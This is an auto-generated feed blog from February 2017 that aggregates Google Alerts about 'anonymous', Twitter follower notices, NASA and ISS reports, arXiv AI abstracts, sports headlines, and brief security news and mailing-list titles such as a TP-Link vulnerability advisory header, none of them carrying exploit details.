Latest YouTube Video

Saturday, February 11, 2017

Disable Form Caching for Anonymous User

Disable Form Caching for Anonymous User. Posted by magahugu2 on February 11, 2017 at 10:32pm. Hi All,. I have successfully disabled caching for ...

from Google Alert - anonymous http://ift.tt/2kj1ljy
via IFTTT

Little dogs....


via Instagram http://ift.tt/2kfImLC

I have a new follower on Twitter


IDIDIT Foundation
Connecting Resources with Recipients! #IDIDIT #1 FREE CrowdFunding Site for ANYTHING FREE https://t.co/4oq4XwNDio
Vancouver
https://t.co/4oq4XwNDio
Following: 36333 - Followers: 56116

February 11, 2017 at 09:01PM via Twitter http://twitter.com/ididitucan

[Suggest] docker volume driver API: Support default-opt for anonymous volume

[Suggest] docker volume driver API: Support default-opt for anonymous volume #30930. Open. ghostplant opened this Issue an hour ago · 0 ...

from Google Alert - anonymous http://ift.tt/2kV1D1Z
via IFTTT

Anonymous

Look at Anonymous profile and browse the latest full & part-time jobs and vacancies in the UK - 298211 - CV-Library.

from Google Alert - anonymous http://ift.tt/2kTdbTy
via IFTTT

I have a new follower on Twitter


GREGOR SIDERIS
European Marketing Leader @IBM #IOT #Industry40 Top Tech Influencer 🌟Luxury Travel Blogger https://t.co/Bi6A2MY4nS views are my own
Vienna Europe
https://t.co/dE1DUQcFtj
Following: 73862 - Followers: 81430

February 11, 2017 at 05:56AM via Twitter http://twitter.com/GregorSIDERIS

Anonymous

Estimated 10 business days production time + shipping time, unless coupled with products that have a longer stated production time.

from Google Alert - anonymous http://ift.tt/2kdTjxd
via IFTTT

Melotte 15 inthe Heart


Cosmic clouds form fantastic shapes in the central regions of emission nebula IC 1805. The clouds are sculpted by stellar winds and radiation from massive hot stars in the nebula's newborn star cluster, Melotte 15. About 1.5 million years young, the cluster stars are scattered in this colorful skyscape, along with dark dust clouds in silhouette against glowing atomic gas. A composite of narrowband and broadband telescopic images, the view spans about 15 light-years and includes emission from ionized hydrogen, sulfur, and oxygen atoms mapped to green, red, and blue hues in the popular Hubble Palette. Wider field images reveal that IC 1805's simpler, overall outline suggests its popular name - The Heart Nebula. IC 1805 is located about 7,500 light years away toward the boastful constellation Cassiopeia. via NASA http://ift.tt/2kb8Ii1

Friday, February 10, 2017

Buddy Montana for Ballers Anonymous

This is part of a series of characters, logotypes and other illustrations that has been done for Ballers Anonymous. Check them out on Instagram ...

from Google Alert - anonymous http://ift.tt/2kChLqx
via IFTTT

U cautions students after anonymous threat to fraternities

U cautions students after anonymous threat to fraternities. February 10, 2017 - 7:40 PM. See more of the story. University of Minnesota officials are ...

from Google Alert - anonymous http://ift.tt/2kS8VU5
via IFTTT

Anonymous Function vs Class Method vs Eval

Anonymous Function. testLambda(Math.random());, pending… Class Method. testClassMethod1(Math.random());, pending… Class Method 2.

from Google Alert - anonymous http://ift.tt/2kcWg1d
via IFTTT

Anonymous Data Service

Find product offerings and instructions on how to access anonymous ... Find the agreement to access anonymous delivery data and request directions.

from Google Alert - anonymous http://ift.tt/2kBSRrm
via IFTTT

One (Anonymous Version)

Untitled One (Anonymous Version) by Pollux is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 License.

from Google Alert - anonymous http://ift.tt/2kdYicy
via IFTTT

UM Police unable to contact sender of anonymous email

An anonymous email, sent Thursday to several offices and email lists across the University of Michigan's Ann Arbor campus, leaves the impression ...

from Google Alert - anonymous http://ift.tt/2kclVaa
via IFTTT

Orioles acquire P Gabriel Ynoa from Mets for cash considerations; 1-0, 6.38 ERA in 10 games in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Hook callback anonymous functions

Is there any difference with hooking functions these 2 different ways? I know the plugin uninstall hook can't use the anonymous function:

from Google Alert - anonymous http://ift.tt/2kX7fv7
via IFTTT

Anonymous Interpreter

The below article is from a fully qualified and registered interpreter, who wanted to share their views but asked for their identity to be hidden in order to ...

from Google Alert - anonymous http://ift.tt/2kbnsgJ
via IFTTT

ISS Daily Summary Report – 2/08/2017

Galley Rack Outfitting: Today the crew relocated the Node 1 16-Port Ethernet Switch from Node 1 Port-Deck location to the Galley Rack. All pre-existing cables remained mated to the switch during relocation, and the switch power feed will remain the same. Later today they will connect the two Microgravity Experiment Research Locker/Incubator (MERLIN) Ethernet connections to the newly relocated switch followed by the crew relocating the MERLIN-2 unit currently located in EXPRESS Rack 6 Locker-2 to the Galley Rack in Node 1.  JEM ORU Transfer Interface (JOTI) Retrieval from PMA2: Earlier today the crew ingressed the Pressurized Mating Adapter-2 (PMA2) and retrieved the JOTI hardware.  After the crew retrieved the JOTI the crew egressed PMA2. JOTI will be used tomorrow, Friday 10-February, to install the Robotics External Leak Locator (RELL) on Japanese Experiment Module (JEM) Airlock (A/L) Slide Table.  RELL operations are planned this weekend to perform surveys, focused around Radiator Beam Valve Module (RBVM) P1-3-2, to assist in an investigation into a possible External Active Thermal Control System (EATCS) Loop B leak.   Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Universal Docking Port (UDP): The crew reconfigured the SPHERES satellites assembling the Docking Port hardware. They then loaded the test software and performed the session with ground support staff direction.  The objectives of the UDP session are to demonstrate a reliably successful docking through running multiple, repeatable docking maneuvers using both global metrology and docking port cameras; perform joint maneuvers of docked satellites using the thrusters from two satellites to demonstrate controllability; and test an algorithm for docking to a satellite which is tumbling in a slow, known manner. The addition of the Docking Ports is a critical upgrade to the SPHERES facility aboard the ISS. With the new ability to dock and undock, SPHERES provides a test bed to address many of the challenges of combining autonomous spacecraft. Mated spacecraft can assemble complex systems in orbit or combine sensors and actuators for satellite servicing and repurposing missions. The SPHERES-UDP enables testing of complex tasks through optimal and adaptive control, autonomous decision-making processes, and real-time image processing.  Cool Flames Investigation: The crew performed a gas bottle change out in the Combustion Integration Rack’s (CIR’s) Fluids and Combustion Facility (FCF) upper rack.  The Cool Flames Investigation will provide new insight into the phenomenon where some types of fuels initially burn very hot, then appear to go out — but they continue burning at a much lower temperature, with no visible flames (cool flames). Understanding cool flame combustion helps scientists develop new engines and fuels that are more efficient and less harmful to the environment. Story Time From Space Buoy Demo: The crew narrated and recorded a video demonstrating how buoyancy and sedimentation occur in microgravity just as it does on Earth. Story Time From Space combines science literacy outreach with simple demonstrations recorded aboard the ISS. Crew members read five science, technology, engineering and mathematics-related children’s books in orbit, and complete simple science concept experiments. Crew members videotape themselves reading the books and completing demonstrations. Video and data collected during the demonstrations are downlinked to the ground and posted in a video library with accompanying educational materials. The narrated demonstration based on the children’s book Max Goes to Space Station. Mobile Servicing System (MSS) Operations:  In preparation for the RELL RBVM scans this weekend, ground controllers walked off Space Station Remote Manipulator System (SSRMS) to Mobile Base System (MBS) Power and Data Grapple Fixture (PDGF) 1, unstowed Special Purpose Dexterous Manipulator (SPDM), and translated the Mobile Transporter (MT) to Worksite (WS)7.  Japanese Experiment Module Remote Manipulator System (JEMRMS) Operations:  Ground controllers at Japan’s Space Station Integration and Promotion Center (SSIPC) will maneuvered JEMRMS to stow Small Fine Arm (SFA) onto SFA Storage Equipment (SSE) and then moved to JEM AL cleared position for the next RELL transfer operation.  Treadmill 2 (T2) Belt Issue: Today the nominal, weekly T2 power cycle was not able to complete. Teams reattempted a ground powercycle via the nominal process with no joy. Crew confirmed the Graphical User Interface (GUI) was closed and the Command Logic Unit (CLU) was still showing as connected. All data LEDs indicated T2 was nominal so T2 was still considered GO for exercise. Later, however, when the crew attempted to exercise, the treadbelt would not spin. Ground teams are meeting today to determine a recovery plan. Today’s Planned Activities All activities were completed unless otherwise noted. SM and DC1 [СТТС] Tagup RELAKSATSIYA. Hardware Setup. DC1 S/G2 Comm Config Fine Motor Skills Experiment Test – Subject MLT2 Setup for EFU Adapter Wireless Access Point Checkout Part 2 Hardware setup for Orlan No.4 and Orlan No.6 checkout RELAKSATSIYA. Parameter Settings Adjustment JEM Airlock Press Orlan No. 4 Activation Water Recovery System Waste Water Tank Drain Termination RELAKSATSIYA. Observation Orlan No.4 and Orlan Interface Unit (БСС) checkout from ПКО-М panel Node 2 Endcone Cleanout RELAKSATSIYA. Closeout Ops and Hardware Removal AstroPi IR health check JEM Airlock Leak Check DAN. Experiment Ops. PMA2 Ingress Galley Ethernet Switch Relocation and Install Galley Closeout Panel JOTI Retrieval from PMA2 Orlan No.4 and БСС storage mode operation PMA2 Egress Orlan No. 6 Activation Node2 Endcone Stowage Replace Dose Tracker Data Entry Subject Orlan No.6 and Orlan Interface Unit (БСС) checkout from ПКО-М panel MLT2 Setup for EFU Adapter Wireless Access Point Checkout Part 3 Long Duration Sorbent Testbed Camera Return Story Time from Space Exploring Buoyancy Demonstration TIMER. Battery Charge Story Time From Space Historical Photo 4K Encoder Disconnect ISS HAM Radio Program MELFI 1 Electronic Unit Remove Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Deactivation Comm reconfig for nominal ops SPHERES Crew Conference SPHERES Test Session Setup ESA Weekly crew conference Combustion Integrated Rack Crew Conference Orlan No.6 and БСС storage mode operation Combustion Integrated Rack Inspection Hardware Gather SPHERES Docking Port Test Run Equipment stowage after Orlan No.4 and Orlan No.6 checkout VEG-03 Plant Photo TIMER. Experiment setup and initiation of video recording Combustion Integrated Rack Bottle Replacement 1 Checkout of SM-AGAT-U42 Monitor Connection VIZIR. […]

from ISS On-Orbit Status Report http://ift.tt/2kX3vd7
via IFTTT

Should Sweden allow anonymous witness testimony?

The idea of anonymous witnesses immediately brings to mind a society of informers. An old and basically self-evident principle establishes that the ...

from Google Alert - anonymous http://ift.tt/2lyHgYy
via IFTTT

[FD] [Call for Papers] InfoSec2017 in Bratislava, Slovakia | June 29-July 1, 2017

InfoSec2017 Invitation CALL FOR PAPERS and PARTICIPATION in The Third International Conference on Information Security and Cyber Forensics (INFOSEC2017) to be hosted by Faculty of Management, Comenius University in Bratislava, Slovakia on June 29-July 1, 2017. The event will be held over three days, with presentations delivered by researchers from the international community, including presentations from keynote speakers and state-of-the-art lectures. Conference Website: http://ift.tt/1tver2s Email: infosec17@sdiwc.net Submission Deadline: May 19, 2017 The conference welcomes papers on the following (but not limited to) research topics: ***Cyber Security -Distributed and Pervasive Systems Security -Enterprise Systems Security -Formal Methods Application in Security -Hardware-Based security -Incident Handling and Penetration Testing -Legal Issues -Multimedia and Document Security -Operating Systems and Database Security -Privacy Issues -SCADA and Embedded systems security -Secure Software Development, Architecture and Outsourcing -Security for Future Networks -Security in Cloud Computing -Security in Social Networks -Security of Web-based Applications and Services -Security protocols -VOIP, Wireless and Telecommunications Network Security ***Digital Forensic -Anti-Forensics and Anti-Forensics Techniques -Cyber-Crimes -Data leakage, Data protection and Database forensics -Evidentiary Aspects of Digital Forensics -Executable Content and Content Filtering -File System and Memory Analysis Multimedia Forensic -Forensics of Virtual and Cloud Environments -Information Hiding -Investigation of Insider Attacks -Large-Scale Investigations -Malware Forensics and Anti-Malware techniques -Network Forensics and Traffic Analysis Hardware Vulnerabilities and Device Forensics -New threats and Non-Traditional Approaches ***Information Assurance and Security Management -Business Continuity & Disaster Recovery Planning -Corporate Governance -Critical Infrastructure Protection -Decidability and Complexity -Digital Rights Management and Intellectual Property -Protection Economics of Security -Fraud Management -Identity Management -Laws and Regulations -Security Policies and Trust Management -Threats, Vulnerabilities, and Risk Management ***Cyber Peacefare and Physical Security -Authentication and Access Control Systems -Biometrics Applications -Biometrics standards and standardization -Cyber Peacefare Trends and Approaches -Electronic Passports, National ID and Smart Card Security -New theories and algorithms in biometrics -Social Engineering -Surveillance Systems -Template Protection and Liveliness Detection Best Regards, *Sandra Evans* Conference Manager, The Society of Digital Information and Wireless Communications (SDIWC) 20/F, Tower 5, China Hong Kong City, 33 Canton Road, Tsim Sha Tsui, Kowloon, Hong Kong Email: sdiwc@sdiwc.net Phone Numbers : from outside USA 001-202-657-4603 from Inside USA 202-657-4603 See more of the upcoming SDIWC Conferences at: www.sdiwc.net

Source: Gmail -> IFTTT-> Blogger

Re: Anonymous access

Hi, I need to login to website to see my orders with username and password. Can you tell me how ot do it? example: i have www.shopify.com . i am.

from Google Alert - anonymous http://ift.tt/2kbq21m
via IFTTT

Anonymous

Look at Anonymous profile and browse the latest full & part-time jobs and vacancies in the UK - 298199 - CV-Library.

from Google Alert - anonymous http://ift.tt/2kaih0t
via IFTTT

2017 Eclipse State Maps

The path of totality passes through 14 states during the total solar eclipse on August 21, 2017. A map of each of these states, created for NASA's official eclipse 2017 website, is presented here. Except for Montana, each map is 8 inches wide (or high) at 300 DPI. The umbra is shown at 3-minute intervals, with times in the local time zone at the umbra center. The duration of totality is outlined in 30-second increments. Interstate highways are blue, other major roads are red, and secondary roads are gray. Some sources list only 12 states for this eclipse, but in fact the path of totality also grazes the southwestern borders of both Montana and Iowa. The Montana part of the path is in a roadless area at the southern end of the Beaverhead Mountains, a range that defines sections of both the Montana-Idaho border and the Continental Divide. The Iowa part of the path is west of Interstate 29 near Hamburg, south of 310 Street, and bounded on the west by the Missouri River. It includes the Lower Hamburg Bend Wildlife Management Area.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Crescent Enceladus


Peering from the shadows, the Saturn-facing hemisphere of tantalizing inner moon Enceladus poses in this Cassini spacecraft image. North is up in the dramatic scene captured last November as Cassini's camera was pointed in a nearly sunward direction about 130,000 kilometers from the moon's bright crescent. In fact, the distant world reflects over 90 percent of the sunlight it receives, giving its surface about the same reflectivity as fresh snow. A mere 500 kilometers in diameter, Enceladus is a surprisingly active moon. Data collected during Cassini's flybys and years of images have revealed the presence of remarkable south polar geysers and a possible global ocean of liquid water beneath an icy crust. via NASA http://ift.tt/2kSnEkD

MMS Phase 2b: Transitioning to Magnetosphere Science on the Darkside

Completing its study of magnetic reconnection at the boundary between Earth and the sun, the MMS spacecraft fleet transitions its orbit to studying magnetospheric events near the shadow of Earth. Current scheduled maneuver times (subject to change) are: February 1, 2017: Resize perigee (the point on the orbit closest to Earth) to 60km February 9, 2017: First apogee (point on the orbit farthest from Earth) raising maneuver April 8, 2017: Final apogee raising maneuver April 16, 2017: Perigee resizing April 26, 2017: Reinitializing formation flying The magnetosphere boundary represents a point of balance between the pressure of the solar wind passing Earth and the outward magnetic pressure of Earth's magnetic field. The location in this visualization is representative at may not accurately reflect the position relative to the spacecraft at any given future time.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2kOlJLk
via IFTTT

Thursday, February 9, 2017

Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild

After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well. The emergence of the first macro-based Word document attack against Apple's macOS platform is the latest example to prove this. The concept of Macros dates back to 1990s. You might be familiar with the message that reads: "Warning: This document contains macros." Macro is a


from The Hacker News http://ift.tt/2kUuSok
via IFTTT

New Windows Trojan Spreads MIRAI Malware To Hack More IoT Devices

MIRAI – possibly the biggest IoT-based malware threat that emerged last year, which caused vast internet outage in October last year by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn. Now, the infamous malware has updated itself to boost its distribution efforts. Researchers from Russian cyber-security firm Dr.Web have now uncovered a


from The Hacker News http://ift.tt/2luqs3P
via IFTTT

Neural Causal Regularization under the Independence of Mechanisms Assumption. (arXiv:1702.02604v1 [cs.LG])

Neural networks provide a powerful framework for learning the association between input and response variables and making accurate predictions and offer promise in using the rapidly growing volume of health care data to surface causal relationships that cannot necessarily be tested in randomized clinical trials. In pursuit of models whose predictive power comes maximally from causal variables, we propose a novel causal regularizer based on the assumption about independence of different steps of data generation process. We use the causal regularizer to steer deep neural network architectures towards causally-interpretable solutions. We perform a large-scale analysis of electronic health records. Our causally-regularized algorithm outperforms its L1-regularized counterpart both in predictive performance as well as causal relevance. Finally, we show that the proposed causal regularizer can be used together with representation learning algorithms to yield up to 20% improvement in the causality score of the generated multivariate hypotheses.



from cs.AI updates on arXiv.org http://ift.tt/2kUuaHv
via IFTTT

Optimal Detection of Faulty Traffic Sensors Used in Route Planning. (arXiv:1702.02628v1 [cs.AI])

In a smart city, real-time traffic sensors may be deployed for various applications, such as route planning. Unfortunately, sensors are prone to failures, which result in erroneous traffic data. Erroneous data can adversely affect applications such as route planning, and can cause increased travel time and environmental impact. To minimize the impact of sensor failures, we must detect them promptly and with high accuracy. However, typical detection algorithms may lead to a large number of false positives (i.e., false alarms) and false negatives (i.e., missed detections), which can result in suboptimal route planning. In this paper, we devise an effective detector for identifying faulty traffic sensors using a prediction model based on Gaussian Processes. Further, we present an approach for computing the optimal parameters of the detector which minimize losses due to false-positive and false-negative errors. We also characterize critical sensors, whose failure can have high impact on the route planning application. Finally, we implement our method and evaluate it numerically using a real-world dataset and the route planning platform OpenTripPlanner.



from cs.AI updates on arXiv.org http://ift.tt/2kUgRHa
via IFTTT

Energy Saving Additive Neural Network. (arXiv:1702.02676v1 [cs.NE])

In recent years, machine learning techniques based on neural networks for mobile computing become increasingly popular. Classical multi-layer neural networks require matrix multiplications at each stage. Multiplication operation is not an energy efficient operation and consequently it drains the battery of the mobile device. In this paper, we propose a new energy efficient neural network with the universal approximation property over space of Lebesgue integrable functions. This network, called, additive neural network, is very suitable for mobile computing. The neural structure is based on a novel vector product definition, called ef-operator, that permits a multiplier-free implementation. In ef-operation, the "product" of two real numbers is defined as the sum of their absolute values, with the sign determined by the sign of the product of the numbers. This "product" is used to construct a vector product in $R^N$. The vector product induces the $l_1$ norm. The proposed additive neural network successfully solves the XOR problem. The experiments on MNIST dataset show that the classification performances of the proposed additive neural networks are very similar to the corresponding multi-layer perceptron and convolutional neural networks (LeNet).



from cs.AI updates on arXiv.org http://ift.tt/2k9zySC
via IFTTT

Graph Based Relational Features for Collective Classification. (arXiv:1702.02817v1 [cs.IR])

Statistical Relational Learning (SRL) methods have shown that classification accuracy can be improved by integrating relations between samples. Techniques such as iterative classification or relaxation labeling achieve this by propagating information between related samples during the inference process. When only a few samples are labeled and connections between samples are sparse, collective inference methods have shown large improvements over standard feature-based ML methods. However, in contrast to feature based ML, collective inference methods require complex inference procedures and often depend on the strong assumption of label consistency among related samples. In this paper, we introduce new relational features for standard ML methods by extracting information from direct and indirect relations. We show empirically on three standard benchmark datasets that our relational features yield results comparable to collective inference methods. Finally we show that our proposal outperforms these methods when additional information is available.



from cs.AI updates on arXiv.org http://ift.tt/2kUl1yC
via IFTTT

Phase Transitions of the Typical Algorithmic Complexity of the Random Satisfiability Problem Studied with Linear Programming. (arXiv:1702.02821v1 [cond-mat.dis-nn])

The Boolean Satisfiability problem asks if a Boolean formula is satisfiable by some assignment of the variables or not. It belongs to the NP-complete complexity class and hence no algorithm with polynomial time worst-case complexity is known, i.e., the problem is hard. The K-SAT problem is the subset of the Boolean Satisfiability problem, for which the Boolean formula has the conjunctive normal form with K literals per clause. This problem is still NP-complete for $K \ge 3$. Although the worst case complexity of NP-complete problems is conjectured to be exponential, there might be subsets of the realizations where solutions can typically be found in polynomial time. In fact, random $K$-SAT, with the number of clauses to number of variables ratio $\alpha$ as control parameter, shows a phase transition between a satisfiable phase and an unsatisfiable phase, at which the hardest problems are located. We use here several linear programming approaches to reveal further "easy-hard" transition points at which the typical hardness of the problems increases which means that such algorithms can solve the problem on one side efficiently but not beyond this point. For one of these transitions, we observed a coincidence with a structural transition of the literal factor graphs of the problem instances. We also investigated cutting-plane approaches, which often increase the computational efficiency. Also we tried out a mapping to another NP-complete optimization problem using a specific algorithm for that problem. In both cases, no improvement of the performance was observed, i.e., no shift of the easy-hard transition to higher values of $\alpha$.



from cs.AI updates on arXiv.org http://ift.tt/2kUrZnl
via IFTTT

Answer Set Solving with Bounded Treewidth Revisited. (arXiv:1702.02890v1 [cs.LO])

Parameterized algorithms are a way to solve hard problems more efficiently, given that a specific parameter of the input is small. In this paper, we apply this idea to the field of answer set programming (ASP). To this end, we propose two kinds of graph representations of programs to exploit their treewidth as a parameter. Treewidth roughly measures to which extent the internal structure of a program resembles a tree. Our main contribution is the design of parameterized dynamic programming algorithms, which run in linear time if the treewidth and weights of the given program are bounded. Compared to previous work, our algorithms handle the full syntax of ASP. Finally, we report on an empirical evaluation that shows good runtime behaviour for benchmark instances of low treewidth, especially for counting answer sets.



from cs.AI updates on arXiv.org http://ift.tt/2lucO0T
via IFTTT

I have a new follower on Twitter


Anonymous
DIARY OF AN OXYGEN THIEF CHAMELEON IN A CANDY STORE EUNUCHS AND NYMPHOMANIACS
New York
http://t.co/OmCxgbsrOV
Following: 4888 - Followers: 3948

February 09, 2017 at 06:34PM via Twitter http://twitter.com/02thief

[FD] TP-Link C2 and C20i vulnerable to command injection (authenticated root RCE), DoS, improper firewall rules

Hello, Please find a text-only version below sent to security mailing lists. The HTML version on "Vulnerabilities found in TP-Link C2 and C20i" is posted here: http://ift.tt/2k4pM9k === text-version of the advisory ===

Source: Gmail -> IFTTT-> Blogger

Popup when selecting anonymous survey in the Survey tool

Currently, when you send an anonymous survey with account tracking you need to have a special token in the email template that looks like ...

from Google Alert - anonymous http://ift.tt/2kxrIFO
via IFTTT

anonymous

anonymous. Apparently, this user prefers to keep an air of mystery about them. 0 answers. 1 question. ~28 people reached. Member since today; 2 ...

from Google Alert - anonymous http://ift.tt/2kTJMuJ
via IFTTT

Anonymous lead web activity is not associated with known lead after form submission

Anonymous lead web activity is not associated with known lead after mapped form submission. Steps to Reproduce With contact form mapped to ...

from Google Alert - anonymous http://ift.tt/2k8Jtbb
via IFTTT

A Truly Anonymous Quiz?

Hello, Last semester my team designed an anonymous quiz which was imported to all courses via an API. The quiz/survey was to be anonymous and ...

from Google Alert - anonymous http://ift.tt/2kTEW0H
via IFTTT

Best anonymous image board

Anon-IB // Best Anonymous Image Board.Jan 27, 2017 . int.anon-ib.ru information at Website Informer. AnonIB // Best Anonymous Image Board.2 ...

from Google Alert - anonymous http://ift.tt/2lsU2Hd
via IFTTT

ISS Daily Summary Report – 2/08/2017

Galley Rack Outfitting: The crew continued with Galley Rack Outfitting today. They mated power, data, and fluid umbilicals to the Galley Rack in preparation for activation. They also relocated the Food Warmer from the Node 1 Starboard location to the Node 1 Galley Rack. Following this relocation the Food Warmer will be powered from the Galley Rack instead of the Ku-Band Power Supply. Japanese Experiment Module (JEM) Exposed Facility Unit (EFU) Adapter Transfer to the Exposed Facility (EF):  Overnight ground specialist at SSIPC maneuvered Japanese Experiment Module Remote Manipulator System (JEMRMS) from Small Fine Arm (SFA) Park Position to JEM airlock to grasp EFU Adapter with SFA. Then they unberthed the EFU Adapter from JEM AL slide table, transferred and install it to EFU 5. Finally, the JEMRMS was maneuvered to SFA Park. NeuroMapping: The crew set up the Neuromapping hardware and executed testing in both a “strapped in” and “free floating” body configuration. During the test, the crewmember executed three Behavioral Assessments: mental rotation, sensorimotor adaptation, and motor-cognitive dual tasking. The NeuroMapping investigation studies whether long-duration spaceflight causes any changes to the brain, including brain structure and function, motor control, and multi-tasking abilities. It also measures how long it would take for the brain and body to recover from possible changes. Previous research and anecdotal evidence from astronauts suggests movement control and cognition can be affected in microgravity. The NeuroMapping investigation performs structural and functional magnetic resonance brain imaging (MRI and fMRI) to assess any changes that occur after spending months on the ISS. Lighting Effects: The crew set up and configured the Light Meter hardware and obtained Light Meter measurements at various locations around the ISS.  Following measurement collections, the data was downlinked. The Lighting Effects investigation studies the impact of the change from fluorescent light bulbs to solid-state light-emitting diodes (LEDs) with adjustable intensity and color and aims to determine if the new lights can improve crew circadian rhythms, sleep, and cognitive performance. Sally Ride Earth Knowledge Acquired by Middle Schools (EarthKam): The crew performed a lens change out for the Sally Ride EarthKam equipment in the Service Module (SM) window and activated the equipment. Sally Ride EarthKam is a NASA education program that enables thousands of students to photograph and examine Earth from a space crew’s perspective. Using the Internet, the students control a special digital camera mounted on-board the International Space Station. This enables them to photograph the Earth’s coastlines, mountain ranges and other geographic items of interest from the unique vantage point of space. The team at Sally Ride EarthKAM then posts these photographs on the Internet for the public and participating classrooms around the world to view. SpX-10 Preparation:  Today the crew performed their Dragon Robotics Onboard Trainer (ROBoT) training session 1.  This training session included material for the crew to perform some Self Study before performing the ROBoT 1 session, which includes a 30m approach, two Capture Point (CP)-hold runs, and 2m runs.  Extravehicular Mobility Unit (EMU) Lithium Ion (Li-Ion) Battery Charger Calibration Verification: Today, the crew ran a series of checks to determine if the Li-Ion Battery Charger is operating within calibration standards. This verification is required once every five years. The EMU Li-Ion Battery Charger Calibration Verification Device (LCVD) and multimeter were connected between the Li-Ion Battery Charger and EMU Li-Ion Battery in order to check the calibration of the battery charger. There were no issues, and the calibration was verified. Extravehicular Activity (EVA) Preparations: The crew completed maintenance on the Simplified Aid for EVA Rescue (SAFER) and Test Module seals. During the activity they measured the SAFER regulator pressure under flow and no-flow conditions, performed a leak check and measured the relief valve opening and reseated pressure of the SAFER. Today’s Planned Activities All activities were completed unless otherwise noted. SM Wireless Access Point (WAP) R&R. SPHERES Battery Swap Fine Motor Skills Experiment Test – Subject Portable Computer System(PCS) R18 Hard Drive Pre-Gather RELAKSATSIYA. Hardware Setup. iPad №13 configuration ESA ACTIVE DOSIMETER MOBILE UNIT SWAP Emergency Descent OBT (Soyuz #733) Cleaning of Panel Ventilation Screens in the FGB (Panels 116, 316, 231, and 431) RELAKSATSIYA. Setting of Parameters. RELAKSACIA. Observation RELAKSATSIYA. Closeout Operations and Hardware Teardown SPHERES Battery Swap TIMER. Charging the Battery COTS UHF Communication Unit (CUCU) Software Update Part 2 VIZIR. Experiment Session In Flight Maintenance (IFM) Node 1/Galley Internal Thermal Control System (ITCS) Reconfig Max CEVIS Exercise Video Setup. Lighting Effects Light Meter Readings Alternate 1 Max CEVIS Exercise Video Stow SPHERES Battery Swap Station Support Computer (SSC) 5 LAB Teardown Kazbek Fitcheck (Soyuz #732) TIMER. Preparation and Beginning of Video Recording of the Experiment Cleaning of Gas-Liquid Heat Exchanger (ГЖТ) Screens 1, 2, 3 in the FGB On-board Training (OBT) Dragon Robotics Onboard Trainer (ROBoT) Session 1 VIZIR. Experiment Session. NeuroMapping Experiment Neurocognitive Test – Subject Dust collectors ПC1,ПС2 filter replacement in FGB Actiwatch Spectrum HRF1 Download Alternate 2 TIMER. End of Video Recording of the Experiment and Closeout Operations VZAIMODEISTVIYE-2. Experiment Session Robotics Onboard Training (ROBoT) Session for Dragon SPHERES Battery Swap Galley Umbilical Interface Panel (UIP) Mate External Wireless Communications Wireless Access Point Antenna Disconnect Galley Utility Outlet Panel (UOP) Checkout after Galley umbilical mate VZAIMODEISTVIYE-2. Experiment Session Galley Foodwarmer Move EarthKAM Node 2 Lens Change-Russian Robotics Onboard Training (ROBoT) Session for Dragon Systems Operations Data File (SODF) Update SPHERES Battery Stow RELAKSATSIYA. Battery Charging for RELAKSATSIYA Experiment (start) Completed Task List Items Veggie 03 Pillow Watering Remove and Replace Waste Hygiene Compartment (WHC) ЕДВ-Y   Ground Activities All activities were completed unless otherwise noted. SSRMS LEE Checkout Battery 3A2 Capacity Test Three-Day Look Ahead: Thursday, 02/09: SPHERES Docking Port Run, Skinsuit Measurements, Galley MERLIN transfer, Story Time – Buoy Demo, EVA Safer Checkout, CIR Bottle Replace Friday, 02/10: JEM Accumulator Package R&R, PMA2 Ingress, RELL and JOTI Install on JEMAL Slide Table, FIR Rack Light Replacement Saturday, 02/11: Housekeeping, Crew Off Duty QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner […]

from ISS On-Orbit Status Report http://ift.tt/2kvP7rp
via IFTTT

Anonymous

Single or taken? Either way, get 15% OFF with code: BEMINE. Track Order. Login/Register. RageOn! Logo. Menu ...

from Google Alert - anonymous http://ift.tt/2lqviz1
via IFTTT

Wednesday, February 8, 2017

I have a new follower on Twitter


Ed Airey
Director, Solutions Marketing @MicroFocus #VisualCOBOL: #COBOL for next gen #developers #COBOLRocks #DevDay #Java #Mainframe #Skills #DevOps views are my own
Boston

Following: 13857 - Followers: 15735

February 08, 2017 at 10:28PM via Twitter http://twitter.com/EdAirey

MLB: Giancarlo Stanton, Adam Jones among 28-man U.S. roster for World Baseball Classic; includes 18 All-Stars and 2 MVPs (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Synergis Engineering
Providing the best quality Autodesk solutions, professional services, and training to ensure our customers' maximum productivity, competitive advantage, and ROI
Quakertown, PA
http://t.co/hqrhMhJcsH
Following: 3390 - Followers: 3838

February 08, 2017 at 09:48PM via Twitter http://twitter.com/SynergisCAD

I have a new follower on Twitter


Tama Fulton
On-air at 100.7 @Seattlewolf | #IMDb @TrueNorthStory® #podcast co-host | @iTunes @GooglePlay | #socialmedia manager @RationalAgency @Microsoft
Seattle, WA
https://t.co/zvuAzO3L3G
Following: 16203 - Followers: 18351

February 08, 2017 at 09:43PM via Twitter http://twitter.com/tamafulton

Generating Multiple Hypotheses for Human 3D Pose Consistent with 2D Joint Detections. (arXiv:1702.02258v1 [cs.CV])

We propose a method to generate multiple hypotheses for human 3D pose all of them consistent with the 2D detection of joints in a monocular RGB image. To generate these pose hypotheses we use a novel generative model defined in the space of anatomically plausible 3D poses satisfying the joint angle limits and limb length ratios. The proposed generative model is uniform in the space of anatomically valid poses and as a result, does not suffer from the dataset bias in existing motion capture datasets such as Human3.6M (H36M), HumanEva, and CMU MoCap. A good model that spans the full variability of human pose and generalizes to unseen poses must be compositional i.e., produce a pose by combining parts. Our model is flexible and compositional and consequently can generalize to every plausible human 3D pose since it is only limited by physical constraints. We discuss sampling from this model and use these samples to generate multiple diverse human 3D pose hypotheses given the 2D detection of joints. We argue that generating multiple pose hypotheses from a monocular RGB image is more reasonable than generating only a single 3D pose given the depth ambiguity and the uncertainty caused by occlusion and imperfect 2D joint detection. To support this argument, we have performed empirical evaluation on the popular Human3.6M dataset that confirms that most often, at least one of our pose hypotheses is closer to the true 3D pose compared to the estimated pose by other recent baseline methods for 3D 